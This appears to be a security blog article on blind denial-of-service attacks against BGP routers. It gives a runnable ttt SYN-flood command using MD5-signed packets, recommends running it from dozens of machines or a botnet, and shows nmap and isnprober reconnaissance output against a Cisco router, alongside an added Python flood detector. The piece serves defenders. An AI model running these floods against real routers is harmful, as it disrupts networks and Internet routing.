"Blind" DoS attacks on BGP routers.
We will call an attack blind when it requires no knowledge beyond the IP address of the BGP router. The simplest DoS of this kind is a SYN flood against TCP port 179. To mount it against an industrial-grade router, an attacker needs several dozen computers, or better still, a botnet.
A more interesting way to flood a target BGP router that uses MD5 authentication is to send TCP SYN packets carrying MD5 signatures: each such packet forces the attacked router to spend CPU on MD5 processing on top of handling the SYN itself.
Such an attack is easy to carry out with the ttt utility and its md5 option. To maximise the flood, several ttt instances should run on each of several dozen machines.
Here is an example of using the ttt utility:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5 allyourbgparebelongtous -D 192.168.66.191 && \
    ./ttt --flood 10000000 -y 179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
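As an added defensive example (not code from the original article or from the ttt utility), the following Python flags the two blind patterns described above in captured traffic: a burst of bare SYNs to TCP/179, and MD5-signed SYNs (TCP option kind 19) from addresses that are not configured neighbours, each of which costs the router an MD5 check. The packet-record layout, thresholds and addresses are assumptions constructed for this example.

```python
from collections import defaultdict

BGP_PORT = 179
TCP_MD5_OPTION = 19      # RFC 2385 TCP MD5 Signature Option kind


def max_in_window(times, window):
    """Largest number of sorted timestamps that fall inside any span of `window` seconds."""
    best, left = 0, 0
    for right, t in enumerate(times):
        while t - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def bgp_syn_findings(packets, known_peers, window=1.0, threshold=50):
    """Scan packet records for blind SYN-flood activity against TCP/179.

    packets: iterable of (ts, src, dst, dport, flags, option_kinds); flags is a
             string such as "S" or "SA", option_kinds lists TCP option kinds seen.
    known_peers: set of source addresses configured as BGP neighbours.
    Returns a list of (kind, dst, detail) tuples.
    """
    syn_times = defaultdict(list)          # dst -> timestamps of bare SYNs
    md5_from_strangers = defaultdict(int)  # dst -> MD5-signed SYNs from non-peers
    for ts, src, dst, dport, flags, options in packets:
        if dport != BGP_PORT or flags != "S":
            continue
        syn_times[dst].append(ts)
        # A signed SYN from a non-peer still forces an HMAC-MD5 check before
        # it can be discarded: the extra load described in the text.
        if TCP_MD5_OPTION in options and src not in known_peers:
            md5_from_strangers[dst] += 1

    findings = []
    for dst, times in syn_times.items():
        peak = max_in_window(sorted(times), window)
        if peak > threshold:
            findings.append(("syn_flood", dst, f"{peak} SYNs within {window}s"))
    for dst, n in md5_from_strangers.items():
        findings.append(("md5_syn_unknown_peer", dst, f"{n} MD5-signed SYNs from non-peers"))
    return findings


# Constructed sample traffic (RFC 5737 documentation addresses): one legitimate
# peer, then a burst of MD5-signed SYNs from spoofed sources, then unrelated SSH.
ROUTER, PEER = "192.0.2.1", "198.51.100.2"
SAMPLE = [(0.0, PEER, ROUTER, 179, "S", [TCP_MD5_OPTION])]
SAMPLE += [(0.5 + i * 0.005, f"203.0.113.{i % 254 + 1}", ROUTER, 179, "S", [TCP_MD5_OPTION])
           for i in range(80)]
SAMPLE.append((2.0, "203.0.113.9", ROUTER, 22, "S", []))   # not BGP, ignored

if __name__ == "__main__":
    for finding in bgp_syn_findings(SAMPLE, known_peers={PEER}):
        print(*finding)
```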
Speaking of Cisco Systems equipment, mention should be made of attacks that exploit overflows in the IOS TCP/IP stack. Tools such as Nmap, hping2, and isnprober can be used to identify such weaknesses.
Here is an example for a Cisco 2600 router:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip>
arhontus# perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port            ISN           Delta
192.168.66.202:23    -1154503313
192.168.66.202:23    -24125463     1130377850
192.168.66.202:23    2031059534    2055184997
192.168.66.202:23    965205234     -1065854300
192.168.66.202:23    -1974685094   -2939890328
192.168.66.202:23    1760147902    3734832996
192.168.66.202:23    2089287258    329139356
192.168.66.202:23    -923724721    -3013011979
192.168.66.202:23    -934490140    -10765419
192.168.66.202:23    -1262713275   -328223135
In general, the BGP version 4 routing protocol is an integral part of the modern Internet, so problems in its operation will inevitably affect the functioning of the global network. Therefore, if a system administrator's duties include maintaining routers that run BGP (as a rule, at service providers), the possible threats must be taken seriously and protective measures put in place in advance.
Oleg Petukhov, lawyer specialising in international law and personal data protection, information security specialist, protection of information and personal data.
Telegram channel: https://t.me/protectioninformation
Telegram Group: https://t.me/informationprotection1
Website: https://legascom.ru
Email: online@legascom.ru
#informationprotection #informationsecurity